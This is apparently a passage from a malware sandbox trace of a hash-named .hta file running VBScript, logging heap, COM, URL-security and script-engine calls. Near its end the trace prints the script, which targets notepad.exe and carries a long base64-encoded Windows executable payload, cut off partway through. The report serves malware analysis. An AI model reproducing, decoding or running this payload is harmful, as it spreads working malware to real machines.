dwFlags=0x0, lpMem=0x4b47c0 | out: hHeap=0x3f0000) returned 1 [0056.371] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4b69d0 | out: hHeap=0x3f0000) returned 1 [0056.371] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4b8be0 | out: hHeap=0x3f0000) returned 1 [0056.372] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4badf0 | out: hHeap=0x3f0000) returned 1 [0056.372] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4bd000 | out: hHeap=0x3f0000) returned 1 [0056.372] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x1df00b0 | out: hHeap=0x3f0000) returned 1 [0056.373] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x1df22c0 | out: hHeap=0x3f0000) returned 1 [0056.373] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x1df44d0 | out: hHeap=0x3f0000) returned 1 [0056.373] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x1df66e0 | out: hHeap=0x3f0000) returned 1 [0056.374] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x1df88f0 | out: hHeap=0x3f0000) returned 1 [0056.374] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4bf400 | out: hHeap=0x3f0000) returned 1 [0056.374] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x1dfab00 | out: hHeap=0x3f0000) returned 1 [0056.375] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x1dfcd10 | out: hHeap=0x3f0000) returned 1 [0056.375] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x1dfef20 | out: hHeap=0x3f0000) returned 1 [0056.375] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x1e01130 | out: hHeap=0x3f0000) returned 1 [0056.376] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x1e03340 | out: hHeap=0x3f0000) returned 1 [0056.376] RtlReAllocateHeap (Heap=0x3f0000, Flags=0x0, Ptr=0x1e30fd0, Size=0xac764) returned 0x2d50080 [0056.395] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x1e05550 | out: hHeap=0x3f0000) returned 1 [0056.395] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x1e07760 | out: hHeap=0x3f0000) returned 1 [0056.396] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x1e09970 | out: hHeap=0x3f0000) returned 1 [0056.396] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x1e0bb80 | out: hHeap=0x3f0000) returned 1 [0056.397] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x1e0dd90 | out: hHeap=0x3f0000) returned 1 [0056.397] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x1e0ffa0 | out: hHeap=0x3f0000) returned 1 [0056.397] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x1e121b0 | out: hHeap=0x3f0000) returned 1 [0056.398] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x1e143c0 | out: hHeap=0x3f0000) returned 1 [0056.398] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x1e165d0 | out: hHeap=0x3f0000) returned 1 [0056.399] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x1e187e0 | out: hHeap=0x3f0000) returned 1 [0056.400] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x1e1a9f0 | out: hHeap=0x3f0000) returned 1 [0056.463] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x1e1cc00 | out: hHeap=0x3f0000) returned 1 [0056.464] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x1e30080 | out: hHeap=0x3f0000) returned 1 [0056.467] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x1e1ee10 | out: hHeap=0x3f0000) returned 1 [0056.470] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x1e21020 | out: hHeap=0x3f0000) returned 1 [0056.472] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x8f4b4) returned 0x2dfc7f0 [0056.486] SetTimer (hWnd=0x20316, nIDEvent=0x1008, uElapse=0x64, lpTimerFunc=0x0) returned 0x1008 [0056.486] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0056.486] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0xa0) returned 0x4517c0 [0056.487] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4517c0 | out: hHeap=0x3f0000) returned 1 [0056.487] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0056.487] IUnknown:AddRef (This=0x44ef70) returned 0x4 [0056.488] IInternetSecurityManager:SetSecuritySite (This=0x7fef0002708, pSite=0x44f420) returned 0x800c0011 [0056.488] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0056.488] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0056.488] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0056.488] IInternetSecurityManager:ProcessUrlAction (in: This=0x7fef0002708, pwszUrl="file:///C:/Users/KEECFM~1/Desktop/4d4d70e1918494a0a39641bd8dbfc23ae6451f3d20396b43f150623b8cfe4e93.hta", dwAction=0x2106, pPolicy=0x30ec70, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x41, dwReserved=0x0 | out: pPolicy=0x30ec70*=0x0) returned 0x0 [0056.488] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0056.488] IUnknown:Release (This=0x44ef70) returned 0x3 [0056.490] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0xa0) returned 0x4517c0 [0056.491] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4517c0 | out: hHeap=0x3f0000) returned 1 [0056.491] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0056.491] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0xa0) returned 0x4517c0 [0056.491] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4517c0 | out: hHeap=0x3f0000) returned 1 [0056.491] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0056.491] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0xa0) returned 0x4517c0 [0056.491] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4517c0 | out: hHeap=0x3f0000) returned 1 [0056.491] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0056.492] RtlReAllocateHeap (Heap=0x3f0000, Flags=0x0, Ptr=0x4d0ae0, Size=0xd8) returned 0x4e1400 [0056.492] ParseURLW (in: pcszURL="file:///C:/Users/KEECFM~1/Desktop/4d4d70e1918494a0a39641bd8dbfc23ae6451f3d20396b43f150623b8cfe4e93.hta", ppu=0x30eee0 | out: ppu=0x30eee0) returned 0x0 [0056.492] IUnknown:AddRef (This=0x44ef70) returned 0x4 [0056.492] IInternetSecurityManager:SetSecuritySite (This=0x7fef0002708, pSite=0x44f420) returned 0x800c0011 [0056.492] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0056.492] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0056.492] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0056.492] IInternetSecurityManager:ProcessUrlAction (in: This=0x7fef0002708, pwszUrl="file:///C:/Users/KEECFM~1/Desktop/4d4d70e1918494a0a39641bd8dbfc23ae6451f3d20396b43f150623b8cfe4e93.hta", dwAction=0x1400, pPolicy=0x30eee0, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0 | out: pPolicy=0x30eee0*=0x0) returned 0x0 [0056.492] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0056.492] IUnknown:Release (This=0x44ef70) returned 0x3 [0056.493] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4218c0 | out: hHeap=0x3f0000) returned 1 [0056.495] ParseURLW (in: pcszURL="file:///C:/Users/KEECFM~1/Desktop/4d4d70e1918494a0a39641bd8dbfc23ae6451f3d20396b43f150623b8cfe4e93.hta", ppu=0x30ee10 | out: ppu=0x30ee10) returned 0x0 [0056.495] IUnknown:AddRef (This=0x44ef70) returned 0x4 [0056.495] IInternetSecurityManager:SetSecuritySite (This=0x7fef0002708, pSite=0x44f420) returned 0x800c0011 [0056.495] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0056.495] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0056.495] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0056.496] IInternetSecurityManager:ProcessUrlAction (in: This=0x7fef0002708, pwszUrl="file:///C:/Users/KEECFM~1/Desktop/4d4d70e1918494a0a39641bd8dbfc23ae6451f3d20396b43f150623b8cfe4e93.hta", dwAction=0x1400, pPolicy=0x30ee10, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0 | out: pPolicy=0x30ee10*=0x0) returned 0x0 [0056.496] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0056.496] IUnknown:Release (This=0x44ef70) returned 0x3 [0056.499] ParseURLW (in: pcszURL="file:///C:/Users/KEECFM~1/Desktop/4d4d70e1918494a0a39641bd8dbfc23ae6451f3d20396b43f150623b8cfe4e93.hta", ppu=0x30ed50 | out: ppu=0x30ed50) returned 0x0 [0056.499] IUnknown:AddRef (This=0x44ef70) returned 0x4 [0056.499] IInternetSecurityManager:SetSecuritySite (This=0x7fef0002708, pSite=0x44f420) returned 0x800c0011 [0056.499] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0056.499] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0056.499] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0056.499] IInternetSecurityManager:ProcessUrlAction (in: This=0x7fef0002708, pwszUrl="file:///C:/Users/KEECFM~1/Desktop/4d4d70e1918494a0a39641bd8dbfc23ae6451f3d20396b43f150623b8cfe4e93.hta", dwAction=0x1400, pPolicy=0x30ed50, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0 | out: pPolicy=0x30ed50*=0x0) returned 0x0 [0056.499] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0056.499] IUnknown:Release (This=0x44ef70) returned 0x3 [0056.501] FaultInIEFeature (in: hWnd=0x20316, pClassSpec=0x30ed40, pQuery=0x0, dwFlags=0x0 | out: pQuery=0x0) returned 0x1 [0056.506] CoCreateInstance (in: rclsid=0x30ed30*(Data1=0xb54f3741, Data2=0x5b07, Data3=0x11cf, Data4=([0]=0xa4, [1]=0xb0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4a, [6]=0x55, [7]=0xe8)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7feeff447a0*(Data1=0xbb1a2ae1, Data2=0xa4f9, Data3=0x11cf, Data4=([0]=0x8f, [1]=0x20, [2]=0x0, [3]=0x80, [4]=0x5f, [5]=0x2c, [6]=0xd0, [7]=0x64)), ppv=0x30ed10 | out: ppv=0x30ed10*=0x689f80) returned 0x0 [0056.870] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x30cf10 | out: lpSystemTimeAsFileTime=0x30cf10*(dwLowDateTime=0x71f417c0, dwHighDateTime=0x1d809f7)) [0056.870] GetCurrentProcessId () returned 0xf10 [0056.870] GetCurrentThreadId () returned 0xf14 [0056.870] GetTickCount () returned 0x1c21369 [0056.870] QueryPerformanceCounter (in: lpPerformanceCount=0x30cf18 | out: lpPerformanceCount=0x30cf18*=2964049608514) returned 1 [0056.870] malloc (_Size=0x100) returned 0x6876f0 [0056.870] __dllonexit () returned 0x7fef1ebbfc0 [0056.871] __dllonexit () returned 0x7fef1ebbfa8 [0056.871] __dllonexit () returned 0x7fef1ebbfd4 [0056.871] GetUserDefaultLCID () returned 0x409 [0056.871] GetVersion () returned 0x1db10106 [0056.872] ??2@YAPEAX_K@Z () returned 0x689f20 [0056.872] ??2@YAPEAX_K@Z () returned 0x689f80 [0056.873] GetUserDefaultLCID () returned 0x409 [0056.873] GetACP () returned 0x4e4 [0056.873] ??3@YAXPEAX@Z () returned 0x49361a01 [0056.874] IUnknown:AddRef (This=0x44ef70) returned 0x4 [0056.874] IInternetSecurityManager:SetSecuritySite (This=0x7fef0002708, pSite=0x44f420) returned 0x800c0011 [0056.874] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0056.874] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0056.874] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0056.874] IInternetSecurityManager:ProcessUrlAction (in: This=0x7fef0002708, pwszUrl="file:///C:/Users/KEECFM~1/Desktop/4d4d70e1918494a0a39641bd8dbfc23ae6451f3d20396b43f150623b8cfe4e93.hta", dwAction=0x1401, pPolicy=0x30ebe0, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0 | out: pPolicy=0x30ebe0*=0x0) returned 0x0 [0056.874] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0056.874] IUnknown:Release (This=0x44ef70) returned 0x3 [0056.875] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0xa0) returned 0x4517c0 [0056.875] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x10) returned 0x4cda80 [0056.875] GetCurrentThreadId () returned 0xf14 [0056.875] ??2@YAPEAX_K@Z () returned 0x68a310 [0056.875] GetCurrentThreadId () returned 0xf14 [0056.875] ??2@YAPEAX_K@Z () returned 0x689f20 [0056.875] ??2@YAPEAX_K@Z () returned 0x68a3f0 [0056.875] ??2@YAPEAX_K@Z () returned 0x68a430 [0056.875] ??2@YAPEAX_K@Z () returned 0x68a500 [0056.875] GetCurrentThreadId () returned 0xf14 [0056.875] ??2@YAPEAX_K@Z () returned 0x68a540 [0056.875] GetCurrentThreadId () returned 0xf14 [0056.875] GetCurrentThreadId () returned 0xf14 [0056.876] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0056.876] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x30eac0, cchData=6 | out: lpLCData="1252") returned 5 [0056.876] IsValidCodePage (CodePage=0x4e4) returned 1 [0056.876] GetCurrentThreadId () returned 0xf14 [0056.877] GetCurrentThreadId () returned 0xf14 [0056.877] LoadLibraryExA (lpLibFileName="ole32.dll", hFile=0x0, dwFlags=0x0) returned 0x7feff2f0000 [0056.877] GetProcAddress (hModule=0x7feff2f0000, lpProcName="CoCreateInstance") returned 0x7feff317490 [0056.877] CoCreateInstance (in: rclsid=0x7fef1f0d5a8*(Data1=0x6c736db1, Data2=0xbd94, Data3=0x11d0, Data4=([0]=0x8a, [1]=0x23, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xb5, [6]=0x8e, [7]=0x10)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fef1f0d5b8*(Data1=0x6c736dc1, Data2=0xab0d, Data3=0x11d0, Data4=([0]=0xa2, [1]=0xad, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xf, [6]=0x27, [7]=0xe8)), ppv=0x68a2c8 | out: ppv=0x68a2c8*=0x4dbce0) returned 0x0 [0056.877] IUnknown:AddRef (This=0x4dbce0) returned 0x2 [0056.878] GetCurrentProcessId () returned 0xf10 [0056.878] GetCurrentThreadId () returned 0xf14 [0056.878] GetTickCount () returned 0x1c21369 [0056.878] ISystemDebugEventFire:BeginSession (This=0x4dbce0, guidSourceID=0x7fef1f0d5d8, strSessionName="VBScript:00003856:00003860:29496169") returned 0x0 [0056.878] GetCurrentThreadId () returned 0xf14 [0056.878] GetCurrentThreadId () returned 0xf14 [0056.878] ??2@YAPEAX_K@Z () returned 0x68a5d0 [0056.878] GetCurrentThreadId () returned 0xf14 [0056.878] StrCmpICW (pszStr1="window", pszStr2="window") returned 0 [0056.878] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x20) returned 0x4e0860 [0056.878] ??2@YAPEAX_K@Z () returned 0x68a620 [0056.878] malloc (_Size=0x80) returned 0x68a720 [0056.878] malloc (_Size=0x108) returned 0x687800 [0056.879] ??2@YAPEAX_K@Z () returned 0x685ae0 [0056.879] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x4e0890 [0056.879] GetCurrentThreadId () returned 0xf14 [0056.881] GetProcAddress (hModule=0x7feff1e0000, lpProcName=0x2) returned 0x7feff1e3480 [0056.881] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x4dbd50 [0056.882] StrCmpIW (psz1="file:///C:/Users/KEECFM~1/Desktop/4d4d70e1918494a0a39641bd8dbfc23ae6451f3d20396b43f150623b8cfe4e93.hta", psz2="file:///C:/Users/KEECFM~1/Desktop/4d4d70e1918494a0a39641bd8dbfc23ae6451f3d20396b43f150623b8cfe4e93.hta") returned 0 [0056.882] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x18) returned 0x4cdac0 [0056.882] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x45bbf0 [0056.882] GetCurrentThreadId () returned 0xf14 [0056.882] _wcsicmp (_String1="window", _String2="window") returned 0 [0056.882] realloc (_Block=0x0, _Size=0xc8) returned 0x68a7b0 [0056.887] _wcsicmp (_String1="", _String2="") returned 0 [0056.900] SysStringLen (param_1="\r\nDim binary : binary = \"notepad.exe\"\r\nDim code : code = \"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